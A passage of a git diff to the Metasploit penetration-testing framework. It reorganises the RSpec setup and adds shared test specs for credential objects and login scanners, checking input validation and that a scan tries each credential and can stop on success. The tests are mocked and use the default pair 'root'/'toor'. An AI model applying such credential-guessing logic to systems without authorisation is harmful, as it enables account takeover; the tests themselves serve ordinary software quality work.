+          "  creds -s ssh,smb    # All creds associated with a login on SSH or SMB services"
         ]
       end
     end
   end
+=end
 
   describe "#cmd_db_import" do
     describe "-h" do
diff --git a/spec/models/metasploit/credential/core_spec.rb b/spec/models/metasploit/credential/core_spec.rb
new file mode 100644
index 0000000000..65cca84721
--- /dev/null
+++ b/spec/models/metasploit/credential/core_spec.rb
@@ -0,0 +1,5 @@
+require 'spec_helper'
+
+describe Metasploit::Credential::Core do
+  it_should_behave_like 'Metasploit::Credential::Core::ToCredential'
+end
\ No newline at end of file
diff --git a/spec/spec_helper.rb b/spec/spec_helper.rb
index 459103aba2..5237d08381 100644
--- a/spec/spec_helper.rb
+++ b/spec/spec_helper.rb
@@ -1,49 +1,44 @@
-# -*- coding:binary -*-
-require 'rubygems'
-require 'bundler'
-Bundler.require(:default, :test, :db)
+# -*- coding: binary -*-
+ENV['RAILS_ENV'] = 'test'
 
-FILE_FIXTURES_PATH = File.expand_path(File.dirname(__FILE__)) + "/file_fixtures/"
-
-# add project lib directory to load path
-spec_pathname = Pathname.new(__FILE__).dirname
-root_pathname = spec_pathname.join('..').expand_path
-lib_pathname = root_pathname.join('lib')
-$LOAD_PATH.unshift(lib_pathname.to_s)
-
-# must be first require and started before any other requires so that it can measure coverage of all following required
-# code.  It is after the rubygems and bundler only because Bundler.setup supplies the LOAD_PATH to simplecov.
 require 'simplecov'
 
-# now that simplecov is loaded, load everything else
+# @note must be before loading config/environment because railtie needs to be loaded before
+#   `Metasploit::Framework::Application.initialize!` is called.
+#
+# Must be explicit as activerecord is optional dependency
+require 'active_record/railtie'
+
+require File.expand_path('../../config/environment', __FILE__)
+
+# Don't `require 'rspec/rails'` as it includes support for pieces of rails that metasploit-framework doesn't use
 require 'rspec/core'
+require 'rails/version'
+require 'rspec/rails/adapters'
+require 'rspec/rails/extensions'
+require 'rspec/rails/fixture_support'
+require 'rspec/rails/matchers'
+require 'rspec/rails/mocks'
+
+FILE_FIXTURES_PATH = File.expand_path(File.dirname(__FILE__)) + '/file_fixtures/'
 
 # Requires supporting ruby files with custom matchers and macros, etc,
 # in spec/support/ and its subdirectories.
-support_glob = root_pathname.join('spec', 'support', '**', '*.rb')
-
-Dir.glob(support_glob) do |path|
-  require path
+Dir[Rails.root.join('spec', 'support', '**', '*.rb')].each do |f|
+  require f
 end
 
 RSpec.configure do |config|
   config.mock_with :rspec
 
-  # Can't use factory_girl_rails since not using rails, so emulate
-  # factory_girl.set_factory_paths initializer and after_initialize for
-  # FactoryGirl::Railtie
-  config.before(:suite) do
-    # Need to load Mdm models first so factories can use them
-    MetasploitDataModels.require_models
+  # Run specs in random order to surface order dependencies. If you find an
+  # order dependency and want to debug it, you can fix the order by providing
+  # the seed, which is printed after each run.
+  #     --seed 1234
+  config.order = 'random'
 
-    FactoryGirl.definition_file_paths = [
-        MetasploitDataModels.root.join('spec', 'factories'),
-        # Have metasploit-framework's definition file path last so it can
-        # modify gem factories.
-        Metasploit::Framework.root.join('spec', 'factories')
-    ]
-
-    FactoryGirl.find_definitions
-  end
+  # If you're not using ActiveRecord, or you'd prefer not to run each of your
+  # examples within a transaction, remove the following line or assign false
+  # instead of true.
+  config.use_transactional_fixtures = true
 end
-
diff --git a/spec/support/shared/contexts/database_cleaner.rb b/spec/support/shared/contexts/database_cleaner.rb
deleted file mode 100644
index 5bbb900e15..0000000000
--- a/spec/support/shared/contexts/database_cleaner.rb
+++ /dev/null
@@ -1,37 +0,0 @@
-# -*- coding:binary -*-
-require 'metasploit/framework/database'
-
-shared_context 'DatabaseCleaner' do
-  def with_established_connection
-    begin
-      ActiveRecord::Base.connection_pool.with_connection do
-        yield
-      end
-    rescue ActiveRecord::ConnectionNotEstablished
-      # if there isn't a connection established, then established one and try
-      # again
-      ActiveRecord::Base.configurations = Metasploit::Framework::Database.configurations
-      spec = ActiveRecord::Base.configurations[Metasploit::Framework.env]
-      ActiveRecord::Base.establish_connection(spec)
-
-      retry
-    end
-  end
-
-  # clean before all in case last test run was interrupted before
-  # after(:each) could clean up
-  before(:all) do
-    with_established_connection do
-      DatabaseCleaner.clean_with(:truncation)
-    end
-  end
-
-  # Clean up after each test
-  after(:each) do
-    with_established_connection do
-      # Testing using both :truncation and :deletion; :truncation took long
-      # for testing.
-      DatabaseCleaner.clean_with(:deletion)
-    end
-  end
-end
diff --git a/spec/support/shared/contexts/msf/db_manager.rb b/spec/support/shared/contexts/msf/db_manager.rb
index c060b5ceb3..7a164523a3 100644
--- a/spec/support/shared/contexts/msf/db_manager.rb
+++ b/spec/support/shared/contexts/msf/db_manager.rb
@@ -1,5 +1,4 @@
 shared_context 'Msf::DBManager' do
-  include_context 'DatabaseCleaner'
   include_context 'Msf::Simple::Framework'
 
   let(:active) do
@@ -11,13 +10,8 @@ shared_context 'Msf::DBManager' do
   end
 
   before(:each) do
-    configurations = Metasploit::Framework::Database.configurations
-    spec = configurations[Metasploit::Framework.env]
-
-    # Need to connect or ActiveRecord::Base.connection_pool will raise an
-    # error.
-    db_manager.connect(spec)
-
+    # already connected due to use_transactional_fixtures, but need some of the side-effects of #connect
+    framework.db.workspace = framework.db.default_workspace
     db_manager.stub(:active => active)
   end
 end
\ No newline at end of file
diff --git a/spec/support/shared/contexts/msf/simple/framework.rb b/spec/support/shared/contexts/msf/simple/framework.rb
index e55df08207..91dd87dc68 100644
--- a/spec/support/shared/contexts/msf/simple/framework.rb
+++ b/spec/support/shared/contexts/msf/simple/framework.rb
@@ -4,7 +4,7 @@ require 'metasploit/framework'
 
 shared_context 'Msf::Simple::Framework' do
   let(:dummy_pathname) do
-    Metasploit::Framework.root.join('spec', 'dummy')
+    Rails.root.join('spec', 'dummy')
   end
 
   let(:framework) do
@@ -33,8 +33,12 @@ shared_context 'Msf::Simple::Framework' do
 
     thread_manager.each do |thread|
       thread.kill
+      # ensure killed thread is cleaned up by VM
+      thread.join
     end
 
     thread_manager.monitor.kill
+    # ensure killed thread is cleaned up by VM
+    thread_manager.monitor.join
   end
 end
diff --git a/spec/support/shared/examples/credential/core/to_credential.rb b/spec/support/shared/examples/credential/core/to_credential.rb
new file mode 100644
index 0000000000..17c56c7c6f
--- /dev/null
+++ b/spec/support/shared/examples/credential/core/to_credential.rb
@@ -0,0 +1,26 @@
+require 'metasploit/framework/credential'
+
+shared_examples_for 'Metasploit::Credential::Core::ToCredential' do
+  context "methods" do
+    context ".to_credential" do
+     
+      subject(:crednetial_core) do
+        FactoryGirl.create(:metasploit_credential_core)
+      end
+      
+      it { should respond_to :to_credential }
+      
+      it "should return a Metasploit::Framework::Credential" do
+        expect(
+          crednetial_core.to_credential
+        ).to be_a Metasploit::Framework::Credential
+      end
+      
+      it "should set the parent to the credential object" do
+        expect(
+          crednetial_core.to_credential.parent
+        ).to eq(crednetial_core)
+      end
+    end
+  end
+end
\ No newline at end of file
diff --git a/spec/support/shared/examples/metasploit/framework/login_scanner/http.rb b/spec/support/shared/examples/metasploit/framework/login_scanner/http.rb
new file mode 100644
index 0000000000..480e5679a2
--- /dev/null
+++ b/spec/support/shared/examples/metasploit/framework/login_scanner/http.rb
@@ -0,0 +1,78 @@
+shared_examples_for 'Metasploit::Framework::LoginScanner::HTTP' do
+  subject(:http_scanner) { described_class.new }
+
+  it { should respond_to :uri }
+  it { should respond_to :method }
+
+  context "#set_sane_defaults" do
+
+    context "without ssl, without port" do
+      it "should default :port to #{described_class::DEFAULT_PORT}" do
+        expect(http_scanner.ssl).to be_false
+        expect(http_scanner.port).to eq(described_class::DEFAULT_PORT)
+      end
+    end
+
+    context "with ssl, without port" do
+      subject(:http_scanner) { described_class.new(ssl:true) }
+      it "should set :port to default ssl port (#{described_class::DEFAULT_SSL_PORT})" do
+        expect(http_scanner.ssl).to be_true
+        expect(http_scanner.port).to eq(described_class::DEFAULT_SSL_PORT)
+      end
+    end
+
+    context "without ssl, with default port" do
+      subject(:http_scanner) { described_class.new(port:described_class::DEFAULT_PORT) }
+      it "should set ssl to false" do
+        expect(http_scanner.port).to eq(described_class::DEFAULT_PORT)
+        expect(http_scanner.ssl).to be_false
+      end
+    end
+
+    context "without ssl, with default SSL port" do
+      subject(:http_scanner) { described_class.new(port:described_class::DEFAULT_SSL_PORT) }
+      it "should set ssl to true" do
+        expect(http_scanner.ssl).to be_true
+        expect(http_scanner.port).to eq(described_class::DEFAULT_SSL_PORT)
+      end
+    end
+
+    context "without ssl, with non-default port" do
+      subject(:http_scanner) { described_class.new(port:0) }
+      it "should not set ssl" do
+        expect(http_scanner.ssl).to be_nil
+        expect(http_scanner.port).to eq(0)
+      end
+    end
+
+  end
+
+  context "#attempt_login" do
+    let(:pub_blank) {
+      Metasploit::Framework::Credential.new(
+          paired: true,
+          public: "public",
+          private: ''
+      )
+    }
+
+    it "Rex::ConnectionError should result in status Metasploit::Model::Login::Status::UNABLE_TO_CONNECT" do
+      allow_any_instance_of(Rex::Proto::Http::Client).to receive(:connect).and_raise(Rex::ConnectionError)
+
+      expect(http_scanner.attempt_login(pub_blank).status).to eq(Metasploit::Model::Login::Status::UNABLE_TO_CONNECT)
+    end
+
+    it "Timeout::Error should result in status Metasploit::Model::Login::Status::UNABLE_TO_CONNECT" do
+      allow_any_instance_of(Rex::Proto::Http::Client).to receive(:connect).and_raise(Timeout::Error)
+
+      expect(http_scanner.attempt_login(pub_blank).status).to eq(Metasploit::Model::Login::Status::UNABLE_TO_CONNECT)
+    end
+
+    it "EOFError should result in status Metasploit::Model::Login::Status::UNABLE_TO_CONNECT" do
+      allow_any_instance_of(Rex::Proto::Http::Client).to receive(:connect).and_raise(EOFError)
+
+      expect(http_scanner.attempt_login(pub_blank).status).to eq(Metasploit::Model::Login::Status::UNABLE_TO_CONNECT)
+    end
+
+  end
+end
diff --git a/spec/support/shared/examples/metasploit/framework/login_scanner/login_scanner_base.rb b/spec/support/shared/examples/metasploit/framework/login_scanner/login_scanner_base.rb
new file mode 100644
index 0000000000..43463c68b7
--- /dev/null
+++ b/spec/support/shared/examples/metasploit/framework/login_scanner/login_scanner_base.rb
@@ -0,0 +1,366 @@
+
+shared_examples_for 'Metasploit::Framework::LoginScanner::Base' do | opts |
+
+  subject(:login_scanner) { described_class.new }
+
+  let(:public) { 'root' }
+  let(:private) { 'toor' }
+  let(:realm) { 'myrealm' }
+  let(:realm_key) { Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN }
+
+  let(:pub_blank) {
+    Metasploit::Framework::Credential.new(
+        paired: true,
+        public: public,
+        private: ''
+    )
+  }
+
+  let(:pub_pub) {
+    Metasploit::Framework::Credential.new(
+        paired: true,
+        public: public,
+        private: public
+    )
+  }
+
+  let(:pub_pri) {
+    Metasploit::Framework::Credential.new(
+        paired: true,
+        public: public,
+        private: private
+    )
+  }
+
+  let(:invalid_detail) {
+    Metasploit::Framework::Credential.new(
+        paired: true,
+        public: nil,
+        private: nil
+    )
+  }
+
+  let(:ad_cred) {
+    Metasploit::Framework::Credential.new(
+        paired: true,
+        public: public,
+        private: private,
+        realm: realm,
+        realm_key: realm_key
+    )
+  }
+
+  let(:detail_group) {
+    [ pub_blank, pub_pub, pub_pri]
+  }
+
+  it { should respond_to :connection_timeout }
+  it { should respond_to :cred_details }
+  it { should respond_to :host }
+  it { should respond_to :port }
+  it { should respond_to :proxies }
+  it { should respond_to :stop_on_success }
+
+  context 'validations' do
+    context 'port' do
+
+      it 'is not valid for a non-number' do
+        login_scanner.port = "a"
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:port]).to include "is not a number"
+      end
+
+      it 'is not valid for a floating point' do
+        login_scanner.port = 5.76
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:port]).to include "must be an integer"
+      end
+
+      it 'is not valid for a negative number' do
+        login_scanner.port = -8
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:port]).to include "must be greater than or equal to 1"
+      end
+
+      it 'is not valid for 0' do
+        login_scanner.port = 0
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:port]).to include "must be greater than or equal to 1"
+      end
+
+      it 'is not valid for a number greater than 65535' do
+        login_scanner.port = 65536
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:port]).to include "must be less than or equal to 65535"
+      end
+
+      it 'is valid for a legitimate port number' do
+        login_scanner.port = rand(65534) + 1
+        expect(login_scanner.errors[:port]).to be_empty
+      end
+    end
+
+    context 'host' do
+
+      it 'is not valid for not set' do
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:host]).to include "can't be blank"
+      end
+
+      it 'is not valid for a non-string input' do
+        login_scanner.host = 5
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:host]).to include "must be a string"
+      end
+
+      it 'is not valid for an improper IP address' do
+        login_scanner.host = '192.168.1.1.5'
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:host]).to include "could not be resolved"
+      end
+
+      it 'is not valid for an incomplete IP address' do
+        login_scanner.host = '192.168'
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:host]).to include "could not be resolved"
+      end
+
+      it 'is not valid for an invalid IP address' do
+        login_scanner.host = '192.300.675.123'
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:host]).to include "could not be resolved"
+      end
+
+      it 'is not valid for DNS name that cannot be resolved' do
+        login_scanner.host = 'nosuchplace.metasploit.com'
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:host]).to include "could not be resolved"
+      end
+
+      it 'is valid for a valid IP address' do
+        login_scanner.host = '127.0.0.1'
+        expect(login_scanner.errors[:host]).to be_empty
+      end
+
+      it 'is valid for a DNS name it can resolve' do
+        login_scanner.host = 'localhost'
+        expect(login_scanner.errors[:host]).to be_empty
+      end
+    end
+
+    context 'cred_details' do
+      it 'is not valid for not set' do
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:cred_details]).to include "can't be blank"
+      end
+
+      it 'is not valid for a non-array input' do
+        login_scanner.cred_details = rand(10)
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:cred_details]).to include "must respond to :each"
+      end
+
+    end
+
+    context 'connection_timeout' do
+
+      it 'is not valid for a non-number' do
+        login_scanner.connection_timeout = "a"
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:connection_timeout]).to include "is not a number"
+      end
+
+      it 'is not valid for a floating point' do
+        login_scanner.connection_timeout = 5.76
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:connection_timeout]).to include "must be an integer"
+      end
+
+      it 'is not valid for a negative number' do
+        login_scanner.connection_timeout = -8
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:connection_timeout]).to include "must be greater than or equal to 1"
+      end
+
+      it 'is not valid for 0' do
+        login_scanner.connection_timeout = 0
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:connection_timeout]).to include "must be greater than or equal to 1"
+      end
+
+      it 'is valid for a legitimate  number' do
+        login_scanner.port = rand(1000) + 1
+        expect(login_scanner.errors[:connection_timeout]).to be_empty
+      end
+    end
+
+    context 'stop_on_success' do
+
+      it 'is not valid for not set' do
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:stop_on_success]).to include 'is not included in the list'
+      end
+
+      it 'is not valid for the string true' do
+        login_scanner.stop_on_success = 'true'
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:stop_on_success]).to include 'is not included in the list'
+      end
+
+      it 'is not valid for the string false' do
+        login_scanner.stop_on_success = 'false'
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:stop_on_success]).to include 'is not included in the list'
+      end
+
+      it 'is  valid for true class' do
+        login_scanner.stop_on_success = true
+        expect(login_scanner.errors[:stop_on_success]).to be_empty
+      end
+
+      it 'is  valid for false class' do
+        login_scanner.stop_on_success = false
+        expect(login_scanner.errors[:stop_on_success]).to be_empty
+      end
+    end
+
+    context '#valid!' do
+      it 'raises a Metasploit::Framework::LoginScanner::Invalid when validations fail' do
+        expect{login_scanner.valid!}.to raise_error Metasploit::Framework::LoginScanner::Invalid
+      end
+    end
+  end
+
+  context '#scan!' do
+    let(:success) {
+      ::Metasploit::Framework::LoginScanner::Result.new(
+          credential: pub_pub,
+          proof: '',
+          status:  Metasploit::Model::Login::Status::SUCCESSFUL
+      )
+    }
+
+    let(:failure_blank) {
+      ::Metasploit::Framework::LoginScanner::Result.new(
+          credential: pub_blank,
+          proof: nil,
+          status: Metasploit::Model::Login::Status::INCORRECT
+      )
+    }
+
+    before(:each) do
+      login_scanner.host = '127.0.0.1'
+      login_scanner.port = 22
+      login_scanner.connection_timeout = 30
+      login_scanner.stop_on_success = false
+      login_scanner.cred_details = detail_group
+    end
+
+    it 'calls valid! before running' do
+      my_scanner = login_scanner
+      my_scanner.should_receive(:valid!)
+      my_scanner.should_receive(:attempt_login).at_least(:once).and_return success
+      my_scanner.scan!
+    end
+
+    it 'should stop trying a user after success' do
+      my_scanner = login_scanner
+      my_scanner.should_receive(:valid!)
+      my_scanner.should_receive(:attempt_login).once.with(pub_blank).and_return failure_blank
+      my_scanner.should_receive(:attempt_login).once.with(pub_pub).and_return success
+      my_scanner.should_not_receive(:attempt_login)
+      my_scanner.scan!
+    end
+
+    it 'call attempt_login once for each cred_detail' do
+      my_scanner = login_scanner
+      my_scanner.should_receive(:valid!)
+      my_scanner.should_receive(:attempt_login).once.with(pub_blank).and_return failure_blank
+      my_scanner.should_receive(:attempt_login).once.with(pub_pub).and_return failure_blank
+      my_scanner.should_receive(:attempt_login).once.with(pub_pri).and_return failure_blank
+      my_scanner.scan!
+    end
+
+    context 'when stop_on_success is true' do
+      before(:each) do
+        login_scanner.host = '127.0.0.1'
+        login_scanner.port = 22
+        login_scanner.connection_timeout = 30
+        login_scanner.stop_on_success = true
+        login_scanner.cred_details = detail_group
+      end
+
+      it 'stops after the first successful login' do
+        my_scanner = login_scanner
+        my_scanner.should_receive(:valid!)
+        my_scanner.should_receive(:attempt_login).once.with(pub_blank).and_return failure_blank
+        my_scanner.should_receive(:attempt_login).once.with(pub_pub).and_return success
+        my_scanner.should_not_receive(:attempt_login).with(pub_pri)
+        my_scanner.scan!
+      end
+    end
+
+  end
+
+  context '#each_credential' do
+
+    if opts[:has_realm_key]
+      context 'when the login_scanner has a REALM_KEY' do
+        context 'when the credential has a realm' do
+          before(:each) do
+            login_scanner.cred_details = [ad_cred]
+          end
+          it 'set the realm_key on the credential to that of the scanner' do
+            output_cred = ad_cred.dup
+            output_cred.realm_key = described_class::REALM_KEY
+            expect{ |b| login_scanner.each_credential(&b)}.to yield_with_args(output_cred)
+          end
+        end
+
+        if opts[:has_default_realm]
+          context 'when the credential has no realm' do
+            before(:each) do
+              login_scanner.cred_details = [pub_pri]
+            end
+            it 'uses the default realm' do
+              output_cred = pub_pri.dup
+              output_cred.realm = described_class::DEFAULT_REALM
+              output_cred.realm_key = described_class::REALM_KEY
+              expect{ |b| login_scanner.each_credential(&b)}.to yield_with_args(output_cred)
+            end
+          end
+        end
+
+      end
+    else
+      context 'when login_scanner has no REALM_KEY' do
+        context 'when the credential has a realm' do
+          before(:each) do
+            login_scanner.cred_details = [ad_cred]
+          end
+          it 'yields the original credential as well as one with the realm in the public' do
+            first_cred  = ad_cred.dup
+            first_cred.realm = nil
+            first_cred.realm_key = nil
+            second_cred = first_cred.dup
+            second_cred.public = "#{realm}\\#{public}"
+            expect{ |b| login_scanner.each_credential(&b)}.to yield_successive_args(ad_cred,second_cred)
+          end
+        end
+
+        context 'when the credential does not have a realm' do
+          before(:each) do
+            login_scanner.cred_details = [pub_pri]
+          end
+          it 'simply yields the original credential' do
+            expect{ |b| login_scanner.each_credential(&b)}.to yield_with_args(pub_pri)
+          end
+        end
+      end
+    end
+
+
+
+  end
+
+end
diff --git a/spec/support/shared/examples/metasploit/framework/login_scanner/ntlm.rb b/spec/support/shared/examples/metasploit/framework/login_scanner/ntlm.rb
new file mode 100644
index 0000000000..e2e88cf173
--- /dev/null
+++ b/spec/support/shared/examples/metasploit/framework/login_scanner/ntlm.rb
@@ -0,0 +1,160 @@
+shared_examples_for 'Metasploit::Framework::LoginScanner::NTLM' do
+
+  subject(:login_scanner) { described_class.new }
+
+  it { should respond_to :send_lm }
+  it { should respond_to :send_ntlm }
+  it { should respond_to :send_spn }
+  it { should respond_to :use_lmkey }
+  it { should respond_to :use_ntlm2_session }
+  it { should respond_to :use_ntlmv2 }
+
+  context 'validations' do
+
+    context '#send_lm' do
+      it 'is not valid for the string true' do
+        login_scanner.send_lm = 'true'
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:send_lm]).to include 'is not included in the list'
+      end
+
+      it 'is not valid for the string false' do
+        login_scanner.send_lm = 'false'
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:send_lm]).to include 'is not included in the list'
+      end
+
+      it 'is valid for true class' do
+        login_scanner.send_lm = true
+        expect(login_scanner.errors[:send_lm]).to be_empty
+      end
+
+      it 'is valid for false class' do
+        login_scanner.send_lm = false
+        expect(login_scanner.errors[:send_lm]).to be_empty
+      end
+    end
+
+    context '#send_ntlm' do
+      it 'is not valid for the string true' do
+        login_scanner.send_ntlm = 'true'
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:send_ntlm]).to include 'is not included in the list'
+      end
+
+      it 'is not valid for the string false' do
+        login_scanner.send_ntlm = 'false'
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:send_ntlm]).to include 'is not included in the list'
+      end
+
+      it 'is valid for true class' do
+        login_scanner.send_ntlm = true
+        expect(login_scanner.errors[:send_ntlm]).to be_empty
+      end
+
+      it 'is valid for false class' do
+        login_scanner.send_ntlm = false
+        expect(login_scanner.errors[:send_ntlm]).to be_empty
+      end
+    end
+
+    context '#send_spn' do
+      it 'is not valid for the string true' do
+        login_scanner.send_spn = 'true'
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:send_spn]).to include 'is not included in the list'
+      end
+
+      it 'is not valid for the string false' do
+        login_scanner.send_spn = 'false'
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:send_spn]).to include 'is not included in the list'
+      end
+
+      it 'is valid for true class' do
+        login_scanner.send_spn = true
+        expect(login_scanner.errors[:send_spn]).to be_empty
+      end
+
+      it 'is valid for false class' do
+        login_scanner.send_spn = false
+        expect(login_scanner.errors[:send_spn]).to be_empty
+      end
+    end
+
+    context '#use_lmkey' do
+      it 'is not valid for the string true' do
+        login_scanner.use_lmkey = 'true'
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:use_lmkey]).to include 'is not included in the list'
+      end
+
+      it 'is not valid for the string false' do
+        login_scanner.use_lmkey = 'false'
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:use_lmkey]).to include 'is not included in the list'
+      end
+
+      it 'is valid for true class' do
+        login_scanner.use_lmkey = true
+        expect(login_scanner.errors[:use_lmkey]).to be_empty
+      end
+
+      it 'is valid for false class' do
+        login_scanner.use_lmkey = false
+        expect(login_scanner.errors[:use_lmkey]).to be_empty
+      end
+    end
+
+    context '#use_ntlm2_session' do
+      it 'is not valid for the string true' do
+        login_scanner.use_ntlm2_session = 'true'
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:use_ntlm2_session]).to include 'is not included in the list'
+      end
+
+      it 'is not valid for the string false' do
+        login_scanner.use_ntlm2_session = 'false'
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:use_ntlm2_session]).to include 'is not included in the list'
+      end
+
+      it 'is valid for true class' do
+        login_scanner.use_ntlm2_session = true
+        expect(login_scanner.errors[:use_ntlm2_session]).to be_empty
+      end
+
+      it 'is valid for false class' do
+        login_scanner.use_ntlm2_session = false
+        expect(login_scanner.errors[:use_ntlm2_session]).to be_empty
+      end
+    end
+
+    context '#use_ntlmv2' do
+      it 'is not valid for the string true' do
+        login_scanner.use_ntlmv2 = 'true'
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:use_ntlmv2]).to include 'is not included in the list'
+      end
+
+      it 'is not valid for the string false' do
+        login_scanner.use_ntlmv2 = 'false'
+        expect(login_scanner).to_not be_valid
+        expect(login_scanner.errors[:use_ntlmv2]).to include 'is not included in the list'
+      end
+
+      it 'is valid for true class' do
+        login_scanner.use_ntlmv2 = true
+        expect(login_scanner.errors[:use_ntlmv2]).to be_empty
+      end
+
+      it 'is valid for false class' do
+        login_scanner.use_ntlmv2 = false
+        expect(login_scanner.errors[:use_ntlmv2]).to be_empty
+      end
+    end
+
+  end
+
+end
diff --git a/spec/support/shared/examples/metasploit/framework/login_scanner/rex_socket.rb b/spec/support/shared/examples/metasploit/framework/login_scanner/rex_socket.rb
new file mode 100644
index 0000000000..6cf9eeb9fb
--- /dev/null
+++ b/spec/support/shared/examples/metasploit/framework/login_scanner/rex_socket.rb
@@ -0,0 +1,60 @@
+shared_examples_for 'Metasploit::Framework::LoginScanner::RexSocket' do
+  subject(:login_scanner) { described_class.new }
+
+  it { should respond_to :send_delay }
+  it { should respond_to :max_send_size }
+  it { should respond_to :ssl }
+  it { should respond_to :ssl_version }
+
+  context 'send_delay' do
+    it 'is not valid for a non-number' do
+      login_scanner.send_delay = "a"
+      expect(login_scanner).to_not be_valid
+      expect(login_scanner.errors[:send_delay]).to include "is not a number"
+    end
+
+    it 'is not valid for a floating point' do
+      login_scanner.send_delay = 5.76
+      expect(login_scanner).to_not be_valid
+      expect(login_scanner.errors[:send_delay]).to include "must be an integer"
+    end
+
+    it 'is not valid for a negative number' do
+      login_scanner.send_delay = -8
+      expect(login_scanner).to_not be_valid
+      expect(login_scanner.errors[:send_delay]).to include "must be greater than or equal to 0"
+    end
+
+    it 'is valid for a legitimate  number' do
+      login_scanner.send_delay = rand(1000) + 1
+      expect(login_scanner.errors[:send_delay]).to be_empty
+    end
+  end
+
+  context 'max_send_size' do
+    it 'is not valid for a non-number' do
+      login_scanner.max_send_size = "a"
+      expect(login_scanner).to_not be_valid
+      expect(login_scanner.errors[:max_send_size]).to include "is not a number"
+    end
+
+    it 'is not valid for a floating point' do
+      login_scanner.max_send_size = 5.76
+      expect(login_scanner).to_not be_valid
+      expect(login_scanner.errors[:max_send_size]).to include "must be an integer"
+    end
+
+    it 'is not valid for a negative number' do
+      login_scanner.max_send_size = -8
+      expect(login_scanner).to_not be_valid
+      expect(login_scanner.errors[:max_send_size]).to include "must be greater than or equal to 0"
+    end
+
+    it 'is valid for a legitimate  number' do
+      login_scanner.max_send_size = rand(1000) + 1
+      expect(login_scanner.errors[:max_send_size]).to be_empty
+    end
+  end
+
+
+end
diff --git a/spec/support/shared/examples/msf/db_manager/import_msf_xml.rb b/spec/support/shared/examples/msf/db_manager/import_msf_xml.rb
index 5e28d2f5e6..cccf0096e7 100644
--- a/spec/support/shared/examples/msf/db_manager/import_msf_xml.rb
+++ b/spec/support/shared/examples/msf/db_manager/import_msf_xml.rb
@@ -273,8 +273,6 @@ shared_examples_for 'Msf::DBManager::ImportMsfXml' do
     end
 
     context 'with :type' do
-      include_context 'DatabaseCleaner'
-
       let(:source) do
         xml.tag!("web_#{type}") do
           web_site = web_vuln.web_site
@@ -618,8 +616,6 @@ shared_examples_for 'Msf::DBManager::ImportMsfXml' do
     end
 
     context 'with required attributes' do
-      include_context 'DatabaseCleaner'
-
       let(:element) do
         document.root
       end
@@ -775,8 +771,6 @@ shared_examples_for 'Msf::DBManager::ImportMsfXml' do
     end
 
     context 'with required attributes' do
-      include_context 'DatabaseCleaner'
-
       let(:element) do
         document.root
       end
@@ -952,8 +946,6 @@ shared_examples_for 'Msf::DBManager::ImportMsfXml' do
     end
 
     context 'with required attributes' do
-      include_context 'DatabaseCleaner'
-
       let(:element) do
         document.root
       end
@@ -1030,8 +1022,6 @@ shared_examples_for 'Msf::DBManager::ImportMsfXml' do
     end
 
     context 'with web_forms/web_form elements' do
-      include_context 'DatabaseCleaner'
-
       let(:data) do
         xml.tag!('MetasploitV4') do
           xml.web_forms do
@@ -1071,8 +1061,6 @@ shared_examples_for 'Msf::DBManager::ImportMsfXml' do
     end
 
     context 'with web_pages/web_page elements' do
-      include_context 'DatabaseCleaner'
-
       let(:data) do
         xml.tag!('MetasploitV4') do
           xml.web_pages do
@@ -1124,8 +1112,6 @@ shared_examples_for 'Msf::DBManager::ImportMsfXml' do
     end
 
     context 'with web_vulns/web_vuln elements' do
-      include_context 'DatabaseCleaner'
-
       let(:data) do
         xml.tag!('MetasploitV4') do
           xml.web_vulns do
diff --git a/spec/support/shared/examples/msf/db_manager/migration.rb b/spec/support/shared/examples/msf/db_manager/migration.rb
index 1bdcbe44c1..bea5e24477 100644
--- a/spec/support/shared/examples/msf/db_manager/migration.rb
+++ b/spec/support/shared/examples/msf/db_manager/migration.rb
@@ -6,12 +6,6 @@ shared_examples_for 'Msf::DBManager::Migration' do
       db_manager.migrate
     end
 
-    it 'should create a connection' do
-      ActiveRecord::Base.connection_pool.should_receive(:with_connection).twice
-
-      migrate
-    end
-
     it 'should call ActiveRecord::Migrator.migrate' do
       ActiveRecord::Migrator.should_receive(:migrate).with(
           ActiveRecord::Migrator.migrations_paths
diff --git a/spec/support/shared/examples/msf/module_manager/cache.rb b/spec/support/shared/examples/msf/module_manager/cache.rb
index 495ca3e2e6..d6ac4f9c1a 100644
--- a/spec/support/shared/examples/msf/module_manager/cache.rb
+++ b/spec/support/shared/examples/msf/module_manager/cache.rb
@@ -358,29 +358,10 @@ shared_examples_for 'Msf::ModuleManager::Cache' do
     end
 
     context 'with framework migrated' do
-      include_context 'DatabaseCleaner'
-
       let(:framework_migrated?) do
         true
       end
 
-      before(:each) do
-        configurations = Metasploit::Framework::Database.configurations
